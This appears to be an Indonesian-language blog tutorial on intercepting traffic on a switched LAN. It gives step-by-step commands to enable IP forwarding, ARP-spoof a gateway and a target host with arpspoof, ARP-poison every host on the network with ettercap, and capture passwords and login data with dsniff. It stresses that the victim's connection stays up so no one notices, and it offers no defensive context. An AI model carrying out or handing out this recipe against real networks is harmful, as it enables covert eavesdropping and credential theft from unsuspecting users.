Dsniff adalah salah satu suite alat sniffing paket yang paling komprehensif dan kuat yang tersedia secara bebas untuk menangkap dan memproses informasi otentikasi. Fungsionalitas dan berbagai utilitasnya telah menjadikannya alat yang umum digunakan oleh penyerang untuk mengendus kata sandi dan informasi otentikasi dari jaringan.
Sakelar jaringan tidak meneruskan paket ke semua orang di jaringan dengan cara yang sama seperti hub jaringan, dan secara teoritis seseorang di jaringan tidak dapat melihat lalu lintas orang lain. Namun ada cara untuk mengatasi masalah ini, yaitu dengan melakukan arp spoofing.
Mengendus
Posting ini hanya akan membahas bagaimana hal itu dilakukan tanpa membahas teori di balik prosesnya. Untuk memulai adalah menginstal program yang diperlukan, yang dalam hal ini adalah paket dsniff yang berisi program arpspoof yang kita butuhkan. Di Ubuntu atau distribusi berbasis Debian lainnya, ini dapat diinstal dengan perintah apt-get sebagai berikut;
Menginstal (Ubuntu)
$ sudo apt-get install dsniff
Aktifkan penerusan IP
Untuk memastikan lalu lintas diteruskan ke tujuan sebenarnya saat mencapai mesin kami, perintah berikut perlu dijalankan;
$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Ini akan memastikan koneksi mesin target tidak terputus, dan tidak ada yang menyadari apa yang kami lakukan.
Jalankan spoofing ARP
Perintah berikut akan memberi tahu gateway “Saya 192.168.0.100”, dan perintah berikutnya memberi tahu 192.168.0.100 “Saya adalah gateway”
$ sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ sudo arpspoof 192.168.0.1 -t 192.168.0.100
Dengan ini, semua lalu lintas yang seharusnya masuk ke gateway dari mesin, dan sebaliknya, akan melalui mesin kami terlebih dahulu, dan baru kemudian diteruskan ke target sebenarnya. Dengan ini kita dapat menjalankan alat analisis paket apa pun seperti tcpdump atau wireshark.
Ettercap
Namun ada program untuk membuat seluruh proses lebih sederhana. Salah satu program yang disukai untuk ini adalah ettercap. Ettercap dapat melakukan spoofing arp juga, di antara banyak fitur lain yang dimilikinya. Di Ubuntu, paket tersebut disebut etercap-gtk;
Menginstal (Ubuntu)
$ sudo apt-get install ettercap-gtk
Jalankan ARP spoofing (GUI)
Menjalankan program dengan sakelar -G akan menjalankannya di GTK, bukan di ncurses.
$ sudo ettercap -G
Pada menu, pilih yang berikut;
Sniff -> Unfied sniffing
Dan saat diminta, pilih antarmuka jaringan yang akan digunakan. Biasanya eth0
Network Interface: eth0
Di menu lagi, pilih yang berikut untuk menambahkan semua host di jaringan ke daftar
Hosts -> Scan for hosts
Dan mengikuti yang berikut ini akan melakukan spoofing arp untuk semua orang di jaringan
Mitm -> Arp poisoning -> Ok Start -> Start sniffing
Jalankan spoofing (perintah) ARP
Perintah berikut akan melakukan hal yang sama seperti contoh di atas, dalam satu perintah tunggal;
$ sudo ettercap -q -T -M arp // //
Contoh Perintah dsniff
1. Untuk memantau jaringan untuk protokol tidak aman:
# dsniff -m [-i interface] [-s snap-length] [filter-expression]
2. Untuk menyimpan hasil dalam database, alih-alih mencetaknya:
# dsniff -w gotcha.db [other options...]
3. Untuk membaca dan mencetak hasil dari database:
# dsniff -r gotcha.db